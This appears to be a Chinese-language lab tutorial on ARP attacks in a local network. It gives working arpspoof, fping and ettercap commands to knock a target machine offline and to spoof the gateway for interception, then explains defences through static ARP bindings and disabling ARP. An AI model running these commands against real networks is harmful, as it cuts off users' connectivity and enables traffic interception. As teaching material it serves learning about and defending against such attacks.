59.局域网内arp攻击（Linux）

一、arp断网攻击
arp攻击是针对同一局域网内的靶机发起攻击，使被攻击的靶机断网，需要知道被攻击目标的地址，网关，和本机网卡。
1.用命令查询需要知道的信息

arpspoof -i 网卡 -t 目标IP 网关  //arp攻击
ifconfig  //查看目标机ip和网卡（在目标机查看，如果不能进入目标机，则用fping在攻击机上查看存活ip）
cat /etc/resolv.conf  //查看目标机网关
fping -asg 192.168.252.0/24  //查看局域网当中存活的ip

查询目标机的ip和网关

2.用errercap图形化工具来查询靶机信息

errercap -G

errtecap

选择Sniff——Unified sniffing(统一嗅探)（默认eth0）——Hosts——Scan for hosts

image.png
image.png

3.确定靶机IP和网关后，可以发起断网攻击。
kali系统发起攻击

arpspoof -i eth0 -t 192.168.252.131 192.168.252.2

kali发起arp攻击

攻击前ping百度是正常的。

攻击前ping百度

当受到攻击时，ping百度就不通了。说明目标机在受到攻击时，网络被迫中断。

攻击后ping百度不通
当kali放开攻击时，目标机网络连接正常。

---

二、arp欺骗攻击是冒充网关向靶机发送假的arp数据包。

echo 1 > /proc/sys/net/ipv4/ip_forward  //冒充过程
arpspoof -i eth0 -t 192.168.252.131 192.168.252.2  //欺骗攻击

发起arp欺骗攻击时，被攻击的靶机不会断网。

image.png

---

三、防止arp攻击
一般在网上通讯的时候网关的IP和MAC的绑定是放在arp 缓存里面的，假的arp包就会刷新这个缓存，导致本该发送到网关的数据包发到了欺骗者那里。

image.png

1.防止arp攻击的一种有效方式是静态arp。将网关的ip和MAC进行绑定。使攻击者无法假装网关对靶机进行攻击。

vim /etc/ethers
192.168.252.2 00:50:56:e0:7e:06

image.png

刷新arp发现网关后多了一个M，表示静态网关

刷新arp

再次尝试用kali攻击靶机，发现，即使在攻击中，靶机也可以照常使用网络。

image.png
ps：解除绑定命令

arp -d 192.168.252.2

image.png

2.第二种方式是关闭arp解析功能

ifconfig eth0 -arp  //关闭arp

但是，这样就不能跟局域网内其他用户进行通信了，也就不能使用xshell来连接虚拟机了。

ifconfig eth0 arp  //开启arp解析功能